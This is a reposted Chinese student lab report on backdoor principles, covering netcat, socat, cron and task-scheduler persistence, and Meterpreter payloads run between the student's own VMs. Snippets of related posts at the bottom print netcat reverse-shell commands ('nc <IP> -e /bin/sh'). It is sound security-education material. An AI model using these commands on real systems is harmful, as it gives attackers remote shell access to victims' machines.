20155325 Exp2 后门原理与实践

最新推荐文章于 2024-10-14 11:30:40 发布
最新推荐文章于 2024-10-14 11:30:40 发布
阅读量162 收藏
点赞数
文章标签: shell 运维 操作系统
原文链接:http://www.cnblogs.com/GDDFZ/p/8711441.html
版权

基础问答

  • 例举你能想到的一个后门进入到你系统中的可能方式?
    乱点链接
    学电脑小白不正确配置电脑
    下载非官网软件

  • 例举你知道的后门如何启动起来(win及linux)的方式?
    软件:ncat socat
    修改文件:crontab
    与其他方式(比如木马)联合,被其他程序启动

  • Meterpreter有哪些给你映像深刻的功能?
    截屏 录音 录像

感觉毫无隐私可言了

  • 如何发现自己有系统有没有被安装后门?

使用杀毒软件;根据系统的行为判定;还有自己的直觉

实验遇到的问题及解决

  • 问题一:虚拟机win7无法打开网页微信登录界面
    解决:换个火狐浏览器

  • 问题二:虚拟机win7和kali同一个IP

    解决:这大概是一个悲伤的故事:我们都生于VB,我win7愿意追随着你-kali;我尽力模仿你的一切,连IP都不放过,但……我们却永远ping不通,我们最近的相遇也仅止于IP了吧。

    后来发现其实是网络设置的模式,VB-设置-网络-连接方式,换一种连接方式

1071478-20180403214209543-70963056.png

但是,故事还是让我觉得太虐了,我觉得虚拟机win7和kali不适合在一起(其实是出于安全性的考量)所以我决定使用“仅主机(Host-Only)网络”模式。把网和杀毒软件关了,主机win的IP用:以太网适配器 VirtualBox Host-Only Network

实验过程

++很多人的过程已经写得很详细了,我这也没有必要赘述,贴出过程图,证明是我自己做的++

推荐链接:
20145215《网络对抗》Exp2 后门原理与实践20155312 张竞予 Exp2 后门原理与实践

Windows获得Linux Shell

1071478-20180403214230744-516480790.png

Linux获得Windows Shell

1071478-20180403214250739-1775151286.png

使用netcat获取主机操作Shell,cron启动

1071478-20180403214301122-178949609.png

使用socat获取主机操作Shell, 任务计划启动

1071478-20180403214312830-923607331.png

1071478-20180403220718979-709989172.png

使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

1071478-20180403214104242-1066986500.png

1071478-20180403214124604-2038716984.png

1071478-20180403214133458-2118475670.png

1071478-20180403214140189-1226667494.png

成功截屏啦~~~

实验感悟

2333特别是做完这个实验后,我觉得网络上是不可能安全的,最简单的办法就是上网的时候规矩些,不乱点,不乱下载东西,不发表奇怪的言论,尽量别留下个人隐私相关的信息。

各位……加油吧

转载于:https://www.cnblogs.com/GDDFZ/p/8711441.html

azxkjsh204704390
关注
20194311姜晨昊Exp2-后门原理实践
weixin_51927594的博客
03-28 1384
20194311姜晨昊Exp2-后门原理实践 实验基础 本次实验需要我们掌握后门的基础知识,学习使用nc实现Windows,Linux之间的后门连接,学习使用Metaspolit的msfvenom指令生成简单的后门程序,学会MSF POST模块的应用。 基础知识 后门的概念 后门就是不经过正常认证流程而访问系统的通道。后门可能出现在编译器中、操作系统中,最常见的是应用程序中的后门,还可能是潜伏于操作系统中或伪装成特定应用的专用后门程序。 常用后门工具 NC和Netcat 底层工具,进行基本的
20194307肖江宇Exp2后门原理实践
MYRLY的博客
03-28 3897
文章目录20194307肖江宇Exp-2后门原理实践1.实验基础1.1基础知识1.2常用后门工具NC和NetcatSoCat任何代理、转发等功能都可以用该工具实现。Meterpreter2.实验目标2.1实验环境3.实验过程3.1使用netcat获取主机操作Shell,cron启动**(1)在主机中获取虚拟机shell****(2)在虚拟机中获取主机shell****(3)在虚拟机中cron启动并在主机监听**3.2使用socat获取主机操作Shell,任务计划启动(1)在Windows获得Linux S
Exp2后门原理实践
03-29 209
一、简单后门 1、ncat、socat的基础操作 工具介绍: netcat(nc、ncat)是一个底层工具,进行基本的TCP UDP数据收发。常被与其他工具结合使用,起到后门的作用。 socat:类似于Netcat的加强版。 以上两个工具均可以在老师课件主页的附件中下载++https://gitee.com/wildlinux/NetSec/attach_files++ Meterpre...
20155327Exp2 后门原理实践
weixin_30597269的博客
04-03 144
20155327Exp2 后门原理实践 一、实验说明 任务一:使用netcat获取主机操作Shell,cron启动 (0.5分) 任务二:使用socat获取主机操作Shell, 任务计划启动 (0.5分) 任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分) 任务四:使用MSF meterpreter(或其...
20164310Exp2后门原理实践
weixin_34272308的博客
03-22 139
一、基础问题回答 1.例举你能想到的一个后门进入到你系统中的可能方式 答:在莫名其妙的网站下载某些莫名奇妙的播放器。 2.例举你知道的后门如何启动起来(win及linux)的方式? 答:对于windows是双击后门软件执行。对于linux,通过cron指令。 3.Meterpreter有哪些给你映像深刻的功能? 答:截屏功能,录音功能,调用摄像头的功能。 4.如何发现自己有系统有没有...
20155223 Exp2 后门原理实践
bali9195的博客
03-27 203
20155223 Exp2 后门原理实践 实验预热 一、windows获取Linux shell Windows:使用 ipconfig 命令查看当前机器IP地址。 进入ncat所在文件地址,输入命令:ncat.exe -l -p 5223。 Linux:在命令行终端输入命令:nc windows主机的IP地址 5223 -e /bin/sh。-e反向连接Windows。 一个回...
Exp2 后门原理实践 毛瀚逸 20164318
03-20 236
Exp2 后门原理实践 20164318 毛瀚逸 一、实验内容 基础问题回答: 1.例举你能想到的一个后门进入到你系统中的可能方式? 答:下载奇怪的文件并运行,通过操作系统的漏洞来获取电脑的高级权限。 2.例举你知道的后门如何启动起来(win及linux)的方式? 答:设置定时运行,在设定的时间自动启动。 3.Meterpreter有...
20192209 Exp2-后门原理实践
LIULIULOO的博客
04-01 754
20192209 Exp2-后门原理实践 学习内容:使用nc实现win,mac,Linux间的后门连接 :meterpreter的应用 :MSF POST 模块的应用 学习目标:建立一个后门连接是如此的简单,功能又如此强大。通过亲手实践并了解这一事实,从而提高自己的安全意识 。 最后编辑:20180221 Wildlinux 1.后门概念 后门就是不经过正常认证流程而访问系统的通道。 哪里有后门呢? 编译器留后门 操作系统后门 最常见的当然还是应用程序中留后门 还有就是潜伏于操作系统..
网络对抗技术-Exp2-后门原理实践 20181314
weixin_46014245的博客
03-15 432
一、实验内容 1.使用netcat获取主机操作Shell,cron启动 Windows获得Linux Shell 在Windows下使用ipconfig查看本机IP win+r 输入cmd,打开监听 nc -l -p 1314 在kali中反弹连接Windows,nc 172.16.214.132 -e /bin/sh,使用-e选项执行shell程序 Windows成功获得kali的shell,利用ls,whoami指令查看相关信息 Linux获得Windows Shell 在kali中使用ifconfi
20204323太晓梅 网络对抗技术 exp2 后门原理实践
m0_57567318的博客
03-24 218
但是我在前期仍然是遇到了很多问题,以前我总是会下意识的向别人求助,但是在本次实验中由于我碰到的问题我周围的人都没有遇到类似的,我想到老师视频中也是遇到了很多困难,但是都是通过自己的各种猜想去判断检查,上网查看解决方法,老师上课时也举例子讲了一些简单的排查流程。但由于前期耗费了大量的时间,后面在对于meterpreter的使用理解的不是很到位,只是参考别人的实验代码理解和使用命令行进行操作,对其内部的机理了解不深,本来想尝试做一下加分项的,但是最后放弃了,在这点上我还需要提高。后门便是其中的一种。
后门原理实践
weixin_30405421的博客
03-28 600
后门就是不经过正常认证流程而访问系统的通道。后门的实现就像是有个间谍能够在我们需要访问系统时为我们开门,我们往往希望后门有隐蔽性和自发性(能自己打开提供通道)。 下面通过实际操作介绍几个常用后门工具。 环境:win10、VMware、kali 利用netcat获取kali的shell netcat最基本的功能是帮助我们建立网络连接(如图1),在此基础上还可以与一些程序绑定以实现远程控制的效...
Exp2 后门原理实践
weixin_33798152的博客
03-28 161
20155332《网络对抗》Exp2 后门原理实践 1.实验环境 主机一台联想台式机,安装有win10系统 。 安装的kali虚拟机为攻击机。 我的win10系统作为靶机。(建议再安装一个虚拟机作为靶机,不要像我这么做。我电脑有点卡,就没有安装那么多虚拟机了) win10系统里,需要安装好ncat工具和socat工具,下载地址见老师的码云。 win10的IP是172.16.2.29,kali虚...
2018-2019 2 20165203 《网络对抗技术》 Exp2 后门原理实践
weixin_30352645的博客
03-24 215
2018-2019 2 20165203 《网络对抗技术》 Exp2 后门原理实践 实验内容 1.使用netcat获取主机操作Shell,cron启动 (0.5分) 2.使用socat获取主机操作Shell, 任务计划启动 (0.5分) 3.使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分) 4.使用M...
Exp2 后门原理实践 20204308李文艳
m0_61155000的博客
03-23 518
在做实验过程中出现了许多小问题,在之后的问题排除过程中可以发现近80%的问题是由于小细节,比如单词拼写错误,缺少空格等,这些问题只要再细心一些就可以避免。
Exp2 后门原理实践 20164311
weixin_30604651的博客
03-23 186
Exp2 后门原理实践 20164311 实验一:使用netcat获取主机操作Shell,cron启动 1.Windows获得Linux Shell (1)打开本机win10的cmd.exe,使用命令ipconfig查看win10的IP地址。 (2)并用命令ncat.exe -l -p 4311监听本机的4311端口...
Shell脚本更新CMakelists.txt, 注释/反注释 #ros2相关的内容
coco的专栏
10-12 721
Qt Creator ROS2没有提供官方集成(2024-10-12),用github开源插件 ros_qtc_plugin(参见我的另外一篇博文),。由于Qt版本变化,插件突然失效,Qt无法打开我的ROS2工程。没时间调研,暂时采取注释掉CMakelists文件中ROS2相关内容,Qt Creator仅用来编辑Qt UI页面,命令行编译方式workaround。Shell 脚本功能:修改CMakelists.txt,注释/取消注释和#ros2 end之间的内容(不包括这两行,以及其他注释)
HWS赛题 入门 MIPS Pwn-HWS_pwn(IDA插件mipsrop)
一个啥也不会的小菜鸡!
10-10 479
libc版本:HWS赛题 入门 MIPS Pwn | Clang裁缝店 (xuanxuanblingbling.github.io)这里的看似是堆溢出其实是栈溢出一处之后直接转为栈溢出劫持返回地址,由于MIPS的栈存在可执行权限所以直接使用shellcode写入栈中,并且使用gadgets跳转执行栈上的shellcode!
shell命令行
最新发布
业精于勤,荒于嬉;行成于思,毁于随
10-14 88
fg。
MSP430G2单片机实战教程: Launchpad开发板与嵌入式系统
"MSP430G2系列单片机原理实践教程" 本教程主要围绕MSP430G2系列单片机展开,旨在提供一个理论与实践相结合的学习平台。MSP430G2是德州仪器(TI)推出的一款高效能、低功耗的16位单片机,它在保持MSP430家族超低...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值